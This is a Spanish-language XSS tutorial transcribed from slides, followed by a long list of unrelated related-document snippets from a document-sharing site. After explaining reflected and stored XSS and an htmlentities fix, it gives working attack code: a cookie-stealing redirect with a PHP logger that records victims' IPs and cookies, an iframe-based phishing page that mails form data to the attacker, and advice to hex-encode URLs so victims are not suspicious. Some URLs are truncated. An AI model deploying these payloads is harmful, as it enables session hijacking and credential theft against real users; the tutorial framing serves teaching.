Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro antonio@noveria.es
|
|
- Belén Gloria Franco Miranda
- hace 8 años
- Vistas:
Transcripción
1 Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro antonio@noveria.es
2 # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés, corresponde a una vulnerabilidad que afecta tanto al usuario como a nivel aplicativo. La causa de la vulnerabilidad radica en la validación de entradas HTML incrustadas, usando diversas técnicas para inyectar código de marcas (HTML) o código ejecutable en la maquina cliente (Javascript, VBscript o Active X). El impacto de este tipo de vulnerabilidades, significa que la entrada (URL previamente manipulada) no la proporciona el mismo usuario, sino un atacante. Su finalidad persiste en la ejecución de la entrada por parte del usuario, con el fin de conseguir diversos objetivos limitados tanto por la capacidad del lenguaje inyectado, como del atacante. # Clasificación La clasificación de este tipo vulnerabilidad persiste en varias tesis, unos lo clasifican como ataques al usuario y ataques al sistema, indirectos y directos, persistentes y no persistentes Es este yo voy a utilizar la siguiente categorización ya que personalmente creo que es la más correcta. Cross Site Scripting Reflejado; es la más común, y no permite la inserción código directo. Sucede cuando se envía un mensaje o ruta en una URL, una cookie o en la cabecera HTTP (pudiendo extenderse al DOM del navegador). Cross Site Scripting Almacenado; los datos son almacenados a través de una Base de Datos ó archivo. La deficiente programación al filtrar las entradas, nos permite la ejecución de código directo. # Escenarios de ataque Estudiamos el siguiente código: <form action="noveria.php" method="post"> <p>tu vulnerabilidad favorita:</p> <p><input type="radio" name="vulnerabilidad" value="xss">xss</p> <p><input type="radio" name="vulnerabilidad" value="lfi">lfi</p> <p><input type="radio" name="vulnerabilidad" value="rfi">rfi</p> <input type="submit" name="boton" value="enviar"> </form> Contenido del archivo noveria.php: <?php # Código del php Vulnerable $Choice = $_REQUEST['vulnerabilidad']; <html> <head></head> <body> <p>su vulnerabilidad favorita es: <?php echo $Choice </p> </body> </html> Podemos observar que noveria.php es vulnerable, debido a que la variable no está filtrada, para corregir este error solo tenemos que filtrar la entrada, utilizando la función htmlentities. Al margen de esta, tenemos más opciones como la función HTMLSpecialchars.
3 # Código del php Vulnerable $Choice = htmlentities($_request['vulnerabilidad']); <html> <head></head> <body> <p>su vulnerabilidad favorita es: <?php echo $Choice </p> </body> </html> La manera o forma de explotar la vulnerabilidad en este caso sería tan sencillo como ejecutar la siguiente URL. cript> Este es el punto y hasta donde el 90% de atacantes llegan en su intento de ataque XSS, pero existen muchas más técnicas y poderes secretos mucho más atractivos y útiles. Como por ejemplo, usando Framesets podemos crear un loop infinito, afectando directamente sobre la maquina local por parte del usuario. Javascript:while(1)alert("loop infinito"); # Suplantación de identidad, robo de coockies Obtención de datos, personalmente el ataque más importante que nos proporciona un cross site scripting, depende en que escenario nos encontremos podemos robar una cookie en concreto, borrar información de una Base de Datos y todo lo que el aplicativo y nuestros conocimientos nos permitan. En este caso nos vamos a centrar en el robo de una cookie en concreto, ya que se puede explotar en varios escenarios y afecta directamente contra la integridad del usuario llegándonos a permitir el acceso al sistema, se podría plantear algunas dudas, si el usuario cierra sesión la cookie caduca, pero gracias a la librería curl, el atacante con la cookie activa en ese momento podría acceder al aplicativo, y dejarlo en cache, en este caso se podría acceder en cualquier momento. Procedemos a estudiar un caso práctico. A través de cualquier medio enviamos la siguiente dirección (URL) al usuario que deseamos obtener su cookie. src= Conociendo que noveria.js ejecuta un archivo php. var ubicacion=' location.href=ubicacion+document.cookie El archivo noveria.php almacena en un archivo.txt con la cookie del usuario y su IP, dicho archivo tiene el siguiente aspecto.
4 $ip = $_SERVER['REMOTE_ADDR']; # Obtención de la IP del usuario $cookie = $_GET['cookie']; # Obtención de la Cookie del usuario $info = "Ip: ". $ip. "Cookie: ". $cookie. " "; $archivo = fopen("cookie.txt",'a'); # Abrimos el archivo.txt fwrite($archivo,$info); # Guardamos la información en el archivo.txt fclose($archivo); # Cerramos el archivo header("location: # Redireccionamos # Phishing Una vulnerabilidad XSS nos permite realizar ataques de phishing utilizando como base el dominio original de la aplicación. Para los más despistados, phishing es un ataque almacenado en el área de la ingeniería social, caracterizado por adquirir información de forma fraudulenta. En este caso vamos a seguir con el ejemplo anterior y vamos a conseguir que en nuestra encuesta, los datos no lleguen a su destino, sino a uno especialmente manipulado. Como ejemplo vamos a almacenar nuestra web manipulada en el dominio con el siguiente script conseguimos modificar el titulo de la página para simular que nos encontramos en la página original, además abre una ventana adicional dentro de la misma página, donde se carga el archivo noveria.html. Este script lo ejecutaremos por medio del XSS. document.title = "Encuesta noveria"; document.write("<iframe src= frameborder=0 framespacing=0 scrolling=auto border=0 marginheight=0 marginwidth=0 width=100% height=100% /> "); Simplemente necesitamos hacer una copia exacta de la web original, y modificamos el form action quedando de la siguiente manera: <form action="noveria-maligna.php" method="post"> <p>tu vulnerabilidad favorita:</p> <p><input type="radio" name="vulnerabilidad" value="xss">xss</p> <p><input type="radio" name="vulnerabilidad" value="lfi">lfi</p> <p><input type="radio" name="vulnerabilidad" value="rfi">rfi</p> <input type="submit" name="boton" value="enviar"> </form> Añadimos el siguiente script al código. <SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT> if (top.frames.length!=0){ top.frames.length=0;} </SCRIPT> De este modo cuando hagamos la petición al archivo noveria-maligna.js, la ventana ocupe el tamaño completo del navegador. Para finalizar nuestra web falsa, debemos crear el archivo noveria-maligna.php, este enviará un correo electrónico con el resultado de la encuesta.
5 # Envio por correo resultado encuesta if ($_POST['vulnerabilidad']){ $leeter = "tu-correo@noveria.es"; $vulnerabilidad = $_POST['vulnerabilidad']; $asunto = "Phishing noveria maligna"; $from = "La vulnerabilidad favorita es: $vulnerabilidad"; mail($leeter, $asunto, $from); } # Redirección header("location: Por lo tanto la URL que vamos a utilizar y difundir para nuestro ataque de phishing es la siguiente: src= Si deseamos aumentar la capacidad de engaño de las URLs, solo debemos transformarlas a hexadecimal, el resultado a nivel ejecución de las URLs es el mismo, diferenciándose en la ofuscación su contenido para evitar cualquier tipo de sospechas ante él usuario.
http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com
XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones
Más detalles################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ##################
################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## [~] Indice [~] 0x01 - Introducción 0x02 - Qué es XSS? 0x03 - Casos en que se presenta XSS
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesÍndice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.
Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar
Más detallesARE YOUR WEB VULNERABLE?
CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML
Más detallesDOCS. Pautas básicas para el DESARROLLO DE PLUGINS
Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................
Más detallesDetectar y solucionar infecciones en un sitio web
Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesÍndice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones
Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo de Cookies 4.3.2 Manejo de Sesiones 4.3.3 Aplicación basada en sesiones Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo
Más detallesHostaliawhitepapers. Redirección 301. Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199. www.hostalia.com
Redirección 301 Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Redirección 301 Alguna vez te has planteado cambiar tu aplicación web que tienes en marcha a otra dirección
Más detallesInternet Information Server
Internet Information Server Internet Information Server 5.0 es un servidor web, que incluye los servicios de HTTP, HTTPS, FTP, SMTP (correo saliente) y NNTP (grupos de noticias). Además es capaz de ejecutar
Más detallesTeléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter.
Como identificar phishing Sobre CSIRT-cv CSIRT-cv es el Centro de Seguridad TIC de la Comunitat Valenciana. Nace en junio del año 2007, como una apuesta de la Generalitat Valenciana por la seguridad en
Más detallesSoftware Criptográfico FNMT-RCM
Software Criptográfico FNMT-RCM ÍNDICE 1. DESCARGA E INSTALACIÓN DEL SOFTWARE 2. EXPORTACIÓN DE CERTIFICADOS EN MICROSOFT INTERNET EXPLORER 3. IMPORTACIÓN DEL CERTIFICADO A LA TARJETA CRIPTOGRÁFICA -2-
Más detallesIntroducción a PHP. * No es necesario declarar previamente las variables.
Introducción a PHP La programación de sitios web cada día está más orientada al desarrollo de páginas dinámicas y aplicaciones, o sea sitios donde el usuario pueda interactuar con la web. Dentro de los
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesMINT A NIVEL BROSERW CON BEEF
MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad
Más detallesRoberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014
Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador
Más detallesPRÁCTICA 10. Configuración de Correo y Publicar en la Web
PRÁCTICA 10. Configuración de Correo y Publicar en la Web INFORMÁTICA BÁSICA Publicidad y Relaciones Públicas y Periodismo. Curso 2006/2007 1. Configuración del correo Gestores de correo en la máquina
Más detallesANTIPHISHING: Qué es? Para qué sirve? De qué protege? Escenarios de aplicación. Recomendaciones y buenas prácticas.
ANTIPHISHING: Qué es? El phishing es una técnica que combina el spam (envío de correos masivos de forma indiscriminada) y la ingeniería social (tácticas de persuasión que suelen valerse de la buena voluntad
Más detallesAyuda básica relativa al interfaz web
Ayuda básica relativa al interfaz web El webmail es un cliente de correo que nos permite visualizar los mensajes de nuestras cuentas de email a través de una página web, pudiendo acceder desde cualquier
Más detallesCookies: qué son y para qué sirven
Cookies: qué son y para qué sirven Desde hace un tiempo las webs nos indican con mensajes que utilizan cookies propias de terceros. Muchos usuarios aceptan el mensaje sin más por el simple hecho de que
Más detallesDOCUMENTOS COMPARTIDOS CON GOOGLE DOCS
DOCUMENTOS COMPARTIDOS CON GOOGLE DOCS 1. Introducción Los ambientes de aprendizaje acompañados de trabajos colaborativos como estrategia se revierten en actividades de diferente índole (análisis de videos,
Más detallesLa plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente.
PLANTILLAS EN PHP El concepto de plantilla, es un criterio del desarrollo web que propone optimizar la cantidad de documentos HTML que se usan en el desarrollo de un sitio web. A lo largo de la navegación
Más detallesCOMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC
TITULO: COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC RESUMEN: La idea de este documento es mostrar una serie de acciones y ayudas básicas para intentar determinar y solucionar problemas en la
Más detallesManual de Usuario de la Herramienta SICRES-Tester. SIR Sistema de Interconexión de Registros. Tipo de documento. Fecha de entrega 08/04/2014
MINISTERIO DE HACIENDA Y ADMINISTRACIONES PÚBLICAS SECRETARÍA DE ESTADO DE ADMINISTRACIONES PÚBLICAS DIRECCIÓN GENERAL DE MODERNIZACIÓN ADMINISTRATIVA, PROCEDIMIENTOS E IMPULSO DE LA ADMINISTRACIÓN ELECTRONICA
Más detallesSu Seguridad es Nuestro Éxito
Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio
Más detallesManual de Webalizer. Sync-Intertainment
Manual de Webalizer Sync-Intertainment ESTADISTICAS WEBALIZER Manual Webalizer Webalizer es un potente programa de estadísticas para su sito web, permite el análisis de los datos obtenidos del log de apache,
Más detallesDesarrollo Web en Entorno Servidor
Desarrollo Web en Entorno Servidor Tema 1: Introducción 1. Tipos de páginas Web. 2. Instalación del software. (XAMPP) 1 Tipos de páginas Web. Páginas estáticas. Páginas dinámicas. 2 Tipos de páginas Web.
Más detalles19 4.1.1.0 4 04/05/2009
Soluciones Informáticas Descripción: Como utilizar la Agenda de Visitas Objetivos: Al finalizar este tutorial el usuario será capaz de utilizar la Agenda de Visitas con sus diferentes opciones: asignar
Más detalles2. Seleccione OneDrive en la parte superior de los sitios de SharePoint u Office 365 de su organización.
Como acceder a nuestra cuenta de OneDrive Business: 1. Inicie sesión en Office 365 (https://portal.office.com). 2. Seleccione OneDrive en la parte superior de los sitios de SharePoint u Office 365 de su
Más detallesSession Hijacking: Secuestro de sesiones en aplicaciones web empresariales
Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com
Más detallesLogin y Password. Elección de directorios confidenciales
Login y Password La verdadera funcionalidad del programa tiene lugar cuando usted no tiene en su poder el ordenador donde lo instala. Por lo tanto, es importante que usted recuerde su login y password
Más detallesTraslado de Copias y Presentación de Escritos. Manual de Usuario V.3.1
Traslado de Copias y Presentación de Escritos Manual de Usuario V.3.1 Página: 2 45 INDICE INTRODUCCIÓN... 3 1 ACCESO A LA APLICACIÓN... 3 2 PROCESO DE FIRMA... 4 3 TRASLADOS PENDIENTES DE ACEPTAR POR EL
Más detallesTe explicamos cómo poner la firma de correo con tu imagen, en los clientes de correo más utilizados:
Firmas de correo Te explicamos cómo poner la firma de correo con tu imagen, en los clientes de correo más utilizados: Correo web/webmail(roundcube), Outlook y Thunderbird. También te explicamos, como crear
Más detallesHacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesSesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Más detallesMANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD
MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...
Más detallesINSTITUTO POLITÉCNICO NACIONAL WEB APPLICATION DEVELOPMENT. CIFUENTES ALVAREZ ALEJANDRO SIGFRIDO 3cm3 PROYECTO TERCER PARCIAL MI HOTMAIL CON JOOMLA
INSTITUTO POLITÉCNICO NACIONAL ESCUELA SUPERIOR DE CÓMPUTO WEB APPLICATION DEVELOPMENT CIFUENTES ALVAREZ ALEJANDRO SIGFRIDO 3cm3 PROYECTO TERCER PARCIAL MI HOTMAIL CON JOOMLA Alumno: MUÑOZ SALAZAR RICARDO
Más detallesBuenas Prácticas en Correo Electrónico
Buenas Prácticas en Correo Electrónico Ataques mas frecuentes que se realizan por Correo Electrónico Tomado de: http://ceds.nauta.es/bpcorreo.ppt Modificado por Lidia Guerra Prevenir los problemas Actos
Más detallesMANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico)
MANUAL DE AYUDA SAT Móvil (Movilidad del Servicio Técnico) Fecha última revisión: Abril 2015 INDICE DE CONTENIDOS INTRODUCCION SAT Móvil... 3 CONFIGURACIONES PREVIAS EN GOTELGEST.NET... 4 1. INSTALACIÓN
Más detallesMANUAL DE AYUDA MANEJO DE SHAREPOINT CON GOTELGEST.NET
MANUAL DE AYUDA MANEJO DE SHAREPOINT CON GOTELGEST.NET Fecha última revisión: Febrero 2012 INDICE DE CONTENIDOS MANEJO DE SHAREPOINT EN GOTELGEST.NET... 3 1. CONFIGURACIÓN GESTIÓN DOCUMENTAL... 3 2. SINCRONIZACIÓN
Más detallesManual Sistema de Afiliados Lomas Travel
Manual Sistema de Afiliados Lomas Travel Contenido Registro de Afiliados... 3 Administración de su cuenta... 7 Ingresar... 7 Uso del Administrador... 8 Configuración de Plantilla... 9 1.-Opción de subir
Más detallesQué es el Phishing. Consejos para evitar el Phishing
Qué es el Phishing La seguridad de nuestros datos se ve comprometida en muchas ocasiones al navegar por Internet, dar las cadenas de nombre de usuario y contraseña en correos electrónicos o seguir enlaces
Más detallesManual de Uso de Webmail
Manual de Uso de Webmail Fecha: 16/06/2014 Version: 1.0 Indice Ingreso al Webmail...3 Descripción general del Entorno...4 Opciones de correo...5 Redactar un nuevo email...6 Opciones de contactos...7 Libreta
Más detallesPowerPoint 2010 Hipervínculos y configuración de acciones
PowerPoint 2010 Hipervínculos y configuración de acciones Contenido CONTENIDO... 1 HIPERVÍNCULOS... 2 CONFIGURACIÓN DE ACCIONES... 6 HIPERVÍNCULOS EN POWERPOINT WEB APP... 8 1 Hipervínculos En Microsoft
Más detallesCONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD
CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD Carpetas sin Conexión... 2 Gestión de mensajes enviados... 3 Gestión de mensajes eliminados... 6 Firma Digital... 8 Envío de mensajes firmados digitalmente...
Más detallesGENERAR DOCUMENTOS HTML USANDO LENGUAJE PHP. EJERCICIO RESUELTO EJEMPLO SENCILLO. (CU00733B)
APRENDERAPROGRAMAR.COM GENERAR DOCUMENTOS HTML USANDO LENGUAJE PHP. EJERCICIO RESUELTO EJEMPLO SENCILLO. (CU00733B) Sección: Cursos Categoría: Tutorial básico del programador web: HTML desde cero Fecha
Más detallesCómo alojar tu blog en servidor propio e instalar Wordpress
Cómo alojar tu blog en servidor propio e instalar Wordpress Este post va a tratar de explicar paso a paso cómo alojar un blog o página web personal en un servidor y posteriormente, cómo instalar la última
Más detallesInstituto Nacional de Formación Docente. Tutorial 5 Líneas de Tiempo con Timerime
Tutorial 5 Líneas de Tiempo con Timerime 1 Introducción a Timerime Timerime (www.timerime.com) es una aplicación que funciona en la web (como otras tantas que forman parte de la llamada Web 2.0). La misma
Más detallesPLATAFORMA ON-LINE DE FORMACIÓN. Manual del Alumno
PLATAFORMA ON-LINE DE FORMACIÓN Manual del Alumno Contenido Glosario... 3 Foros... 4 Cuestionario... 5 Wiki... 6 Tareas... 7 Cursos... 8 Participantes... 9 Calificaciones... 10 Perfil... 11 Scorm... 14
Más detallesCREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA OUTLOOK EXPRESS 6
CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA OUTLOOK EXPRESS 6 Creación y configuración de la cuenta IMAP... 2 Hacer copia de seguridad del correo... 6 Eliminación de la antigua cuenta de correo...
Más detallesPROGRAMACIÓN PÁGINAS WEB CON PHP
PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesAyuda para la instalación Componente Firma Digital INDICE. 1 Configuración previa...2. 1.1 Configuración Internet Explorer para ActiveX...
INDICE 1 Configuración previa...2 1.1 Configuración Internet Explorer para ActiveX...2 1.2 Problemas comunes en sistema operativo Windows...8 1.2.1 Usuarios con sistema operativo Windows XP con el Service
Más detallesSesiones en PHP. Área de Ingeniería Telemática
Sesiones en PHP Contenido Estado de la conexión con el navegador Cookies Sesiones Sesiones en PHP 2 Estado de la conexión con el navegador Cuando el usuario solicita una página que es en verdad un PHP
Más detallesManual del panel. Core-Admin
Manual del panel Core-Admin - Manual del panel Core-Admin ÍNDICE 1. Introducción...3 2. Requisitos iniciales...3 2.1. Navegadores soportados...3 2.2. Javascript y Java...3 3. Usar Core-Admin...3 3.1. Acceder
Más detallesAplicateca. Manual de Usuario: Ilion Factura Electrónica. Espíritu de Servicio
Aplicateca Manual de Usuario: Ilion Factura Electrónica Espíritu de Servicio Índice 1 Introducción... 4 1.1 Qué es Ilion Factura electrónica?... 4 1.2 Requisitos del sistema... 4 1.3 Configuración del
Más detallesS E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Más detallesPANEL DE CONTROL (Zona de Administración) MANUAL DE USO Por conexanet. Revisión 1.1 Fecha 2006-08
PANEL DE CONTROL (Zona de Administración) MANUAL DE USO Por conexanet Revisión 1.1 Fecha 2006-08 Índice 1. Acceder 2. Menú 3. Gestión Básica 3.1 Añadir 3.2 Editar 3.3 Eliminar 3.4 Eliminación de registros
Más detalles==== Introducción. ==== Buscando un fallo
=============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================
Más detallesCómo capturar páginas web con el programa GNU Wget
Cómo capturar páginas web con el programa GNU Wget Raúl Araya, Judit Feliu, Mercedes Suárez {raul.araya; judit.feliu; mercedes.suarez}@iula.upf.es Qué es GNU Wget? Una utilidad de código abierto (GNU)
Más detallesUna App para Facebook
Una App para Facebook Static HTML: Iframes Tabs Laboratorio de Excelencia Digital Facebook Marketing 1 Una App para Facebook. Static HTML: Iframes Tabs Facebook Marketing El objetivo de este articulo es
Más detallesWeb: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen
Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.
Más detallesBibliotecas Escolares. Perfil de Lector.
Bibliotecas Escolares. Perfil de Lector. 2012 Como usuario Lector de AbiesWeb, podrás acceder al catálogo de fondos, solicitar reservas, ver tus préstamos activos, ver el historial de tus lecturas, escribir
Más detallesTécnicas para mantener estado entre páginas con PHP
Técnicas para mantener estado entre páginas con PHP Buenos Aires, Septiembre de 2007 Román A. Mussi romanmussi@gmail.com 1. Alcance de variables en aplicaciones de escritorio y en aplicaciones web En el
Más detallesDistribución de vídeo capturado con la cámara en las páginas Web
Distribución de vídeo capturado con la cámara en las páginas Web Este documento ofrece información de referencia relacionada con la distribución de vídeo capturado con la cámara en una página Web. Personalización
Más detallesCONFEDERACIÓN DE EMPRESARIOS DE MÁLAGA
GUÍA DEL ALUMNO 1 Introducción 2 Acceso a la plataforma 3 Cerrar sesión 4 Estructura del curso virtual 5 Foros 5.1 No quiero recibir copias de los foros en mi email 6 Mensajería Interna 7 Como subir tareas
Más detallesLa utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.
Procesamiento del lado del servidor La Programación del lado del servidor es una tecnología que consiste en el procesamiento de una petición de un usuario mediante la interpretación de un script en el
Más detallesManual de usuario de Parda Programa de Almacenamiento y Recuperación de Datos Automático
Programa de Almacenamiento y Recuperación de Datos Automático CONSEJERÍA DE EDUCACIÓN Dirección General de Participación e Innovación Educativa Centro de Gestión Avanzado de Centros TIC Fecha: 20/04/10
Más detallesGUÍA PARA LA INSTALACIÓN Y USO DE WORDPRESS BY MASTERHACKS. www.masterhacks.net. Guía de instalación y uso de Wordpress Página 1
GUÍA PARA LA INSTALACIÓN Y USO DE WORDPRESS BY MASTERHACKS www.masterhacks.net Guía de instalación y uso de Wordpress Página 1 Wordpress es un sistema muy utilizado para la creación de blogs. Este se puede
Más detallesMi correo con OUTLOOK
Mi correo con OUTLOOK En este manual vamos a ver los pasos necesarios para configurar nuestra cuenta de correo. En primer lugar, ejecutaremos nuestro cliente outlook. Si es la primera vez que ejecutamos
Más detallesCREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA MOZILLA THUNDERBIRD
CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA MOZILLA THUNDERBIRD Realización de copia de seguridad del correo actual... 2 Creación y configuración de la cuenta IMAP... 6 Migración de carpetas de POP
Más detallesAPÉNDICE E: MANUAL DE USUARIO PARA EL SISTEMA DE MONITOREO DE REDES LAN.
APÉNDICE E: MANUAL DE USUARIO PARA EL SISTEMA DE MONITOREO DE REDES LAN. Objetivo: Mostrar al usuario administrador el funcionamiento del sistema, junto con los datos que debe ingresar, además de interactuar
Más detallesEste tipo de situaciones son solventadas a partir de las variables de sesión.
INDICE 1.- Concepto de Sesión 2.- Variables de Sesión 3.- Iniciando sesiones 4.- Creando variables de sesión 1.- Concepto de Sesión En los programas que hemos visto hasta ahora, hemos utilizado variables
Más detallesMANUAL DE USO DE LA APLICACIÓN
MANUAL DE USO DE LA APLICACIÓN ÍNDICE 1. Acceso a la aplicación 2. Definición de funciones 3. Plantillas 4. Cómo crear una nueva encuesta 5. Cómo enviar una encuesta 6. Cómo copiar una encuesta 7. Cómo
Más detallesManual de uso del convenio de Microsoft MSDN Academic Alliance
Manual de uso del convenio de Microsoft MSDN Academic Alliance Contenido Manual de Uso del Convenio MSDN AA... 2 Activación de la cuenta de usuario válido.... 2 Ingreso a la plataforma... 3 Selección de
Más detallesConstrucción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL.
Sistema de encuestas PHP y MySQL Construcción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL. Sistema de encuestas. Base de datos a utilizar Algunas
Más detallesInternet Information Server
Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en
Más detallesJornadas de INCLUSION DIGITAL. a través de las TIC ORGANIZAN: CAPACITA: CLAEH
Jornadas de INCLUSION DIGITAL a través de las TIC ORGANIZAN: CAPACITA: CLAEH PRINCIPIOS DE LA NAVEGACIÓN EN INTERNET QUÉ ES EL EXPLORADOR WEB? El explorador Web es la herramienta creada para el uso y explotación
Más detallesLoewe Preguntas frecuentes 22.09.2009 Página 1. Loewe Support Portal. Preguntas frecuentes.
Página 1 Loewe Support Portal.. Página 2 Loewe Support Portal.. Por qué no puedo iniciar sesión con mi dirección de correo electrónico y mi contraseña? Debe hacer clic en el enlace de confirmación de su
Más detallesPREPARAR E IMPRIMIR DOCUMENTOS
PREPARAR E IMPRIMIR DOCUMENTOS Preparar documentos Cuando trabajamos en internet, es probable que mucha de la información que encontramos útil, la necesitemos guardar en nuestro computador, ya sea en el
Más detallesINTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD. Estructura de contenidos: http://www.ucv.edu.pe/cis/ cisvirtual@ucv.edu.pe. 1.
INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD 1 Estructura de contenidos: 1. Programación Web 2. Sistema De Información 3. Sistema Web 4. Requisitos Para Sistemas Web Con Asp 5. Internet Information Server
Más detallesCómo publicar el contenido del servidor All-In-One (AIO) a través de WMS o mediante el reproductor nativo
Cómo publicar el contenido del servidor All-In-One (AIO) a través de WMS o mediante el reproductor nativo ImaginArt 2010 Página 1 de 11 1. Publicar el Live Streaming (Windows Media Server - WMS) Esquema
Más detallesSolución al Primer Reto
En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e
Más detallesInstructivo antivirus y antispam Barracuda
Instructivo antivirus y antispam Barracuda Barracuda El antivirus y antispam Barracuda es un sistema que automáticamente revisa todo el correo electrónico que entra con destino a su dirección de correo,
Más detallesPROGRAMA FORMATIVO MICROSOFT ACCESS 2007 (COMPLETO)
PROGRAMA FORMATIVO MICROSOFT ACCESS 2007 (COMPLETO) www.bmformacion.es info@bmformacion.es Objetivos Descripción del funcionamiento del programa de gestión de bases de datos Microsoft Access 2007, estudiando
Más detallesWINDOWS 2008 5: TERMINAL SERVER
WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.
